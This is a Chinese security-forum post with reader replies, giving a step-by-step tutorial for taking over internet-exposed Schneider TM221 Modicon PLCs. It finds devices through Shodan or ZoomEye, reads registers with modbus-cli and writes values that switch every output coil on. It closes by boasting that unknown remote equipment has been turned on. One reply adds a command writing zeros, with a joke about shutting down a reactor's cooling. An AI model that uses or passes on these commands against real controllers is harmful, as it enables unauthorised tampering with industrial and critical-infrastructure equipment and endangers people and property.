用户
搜索
  • TA的每日心情

    2018-4-19 01:50
  • 签到天数: 65 天

    连续签到: 8 天

    [LV.6]常住居民II

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    3

    主题

    22

    帖子

    82

    魔法币
    收听
    0
    粉丝
    0
    注册时间
    2017-6-5

    i春秋签约作者

    发表于 2017-12-30 12:59:47 85808
    本帖最后由 hacklikepro 于 2017-12-30 12:59 编辑

    关注我的github: https://github.com/1337g

    简单介绍:

    SCADA/ICS工控安全随着最近几年的重大国际安全事件频发得到了相当的重视黑掉一个发电站、一个水坝、一个工厂都可以引起相当巨大的后果与损失。
    我们这篇所说的TM221 Modicon PLC是由施耐德电子开发的一款 PLC(programmabl logic contrllers 可编程逻辑控制器)设备
    PLC在工控领域中有相当广泛的应用如油田、生产线、电网、发电站都有用到。

    1.png

    TM221 Modicon PLC 长这样:
    6a4a49_56b13190ca4646488bc13edf02d16713_mv2.png

    实验用的工具 modbus-cli 在kali里面能够找到
    想了解工控数据交互的同学最好先看下 Modbus : SCADA/ICS 的通讯协协议。


    开始黑

    第一步:上 shodan或者zoomeye找TM221
    ===
    6a4a49_84e8fb418132474db1d90661b3085ad4_mv2.png

    第二步:安装 modbus-cli
    ===
    进入kali

    安装 modbus-cli
    kali > gem install modbus-cli

    用法 modbus-cli + 命令
    modbus-cli Syntax

    我们来看下有哪些命令
    kali > modbus -help
    6a4a49_d4f8a279fc7742faa005da755b362ce6_mv2.png

    基本的命令用法如下
    kali > modbus [options] SUBCOMMAND [arguments]

    第三部: TM221基本操作语法
    ===
    从施耐德的官网上我们找到了基本语法
    6a4a49_ca1cc2a2a3fe48bab953bf2a2cb23111_mv2.png

    第四部:用 Modbus-cli 独处寄存数据

    ===
    kali> modbus read <IP> %MW100 10
    ===

    命令功能: 用 modbus 读取前是个 0-9 寄存器的内容。
    %MW100 -> 施耐德数据传输格式的的头
    10 -> 读取寄存器数量

    6a4a49_553340c3586548aa995b5dd784a0f99d_mv2.png

    kali > modbus read <IP> 400101 10
    ============================
    命令功能: 用 modbus 读取前是个 0-9 寄存器的内容。
    400101 -> 施耐德子牌 modicon 数据传输格式的的头在这款PLC也可以使用效果相同
    10 -> 读取寄存器数量

    6a4a49_553340c3586548aa995b5dd784a0f99d_mv22.png

    第五步:读取线圈开关状态
    ===

    当我们用%M100去做读取操作时如上表会返回一个布尔值。
    这个值就代表这个线圈开关的状态,如果这个值为1则对应控制的设备就处于通电工作的状态。
    6a4a49_30778afda8fd434ea834b69bb33333333.png
    图中返回值显示目前 100 102 104 都处于开启状态

    第六步:打开开关
    ===

    kali > modbus write <IP> %MW100 1 1 1 1 1 1 1 1 1 1
    6a4a49_bc6f4cc9a0b243899b89d4ca89ac9de1_mv2.png

    请求结束后我们在读取看看状态?
    6a4a49_0a3fe08b5a854aa2abe4612b6c4b8011_mv2 (1).png
    全打开了!!!


    结论:
    就这么简单 。世界的另一头10个开关就被小白打开了,对应的设备是什么呢?那就不得而知了~

    u=2758387823,2783544343&amp;fm=27&amp;gp=0.jpg










    a1.png

    本帖被以下淘专辑推荐:

    发表于 2017-12-30 14:09:13
    这样不好吧.....
    使用道具 举报 回复
    发表于 2017-12-31 22:24:44
    留个言看看什么情况
    使用道具 举报 回复
    发表于 2018-1-1 12:30:44
    搜索不出来啊
    使用道具 举报 回复
    发表于 2018-1-1 13:10:07
    mark,持续关注scada
    使用道具 举报 回复
    发表于 2018-1-2 09:17:43
    感谢分享~~~~~~
    使用道具 举报 回复
    发表于 2018-1-2 17:07:02
    学习!!学习!!
    使用道具 举报 回复
    发表于 2018-1-2 20:11:32
    楼主辛苦,多谢分享
    使用道具 举报 回复
    发表于 2018-1-3 10:19:25
    modbus write <IP> %MW100 0 0 0 0 0 0 0 0 0 0
    新闻 xxxx核电站核反应堆因降温系统被意外关闭导致爆炸。目前xxx城市xxx公里内受影响 预计达到30年!
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册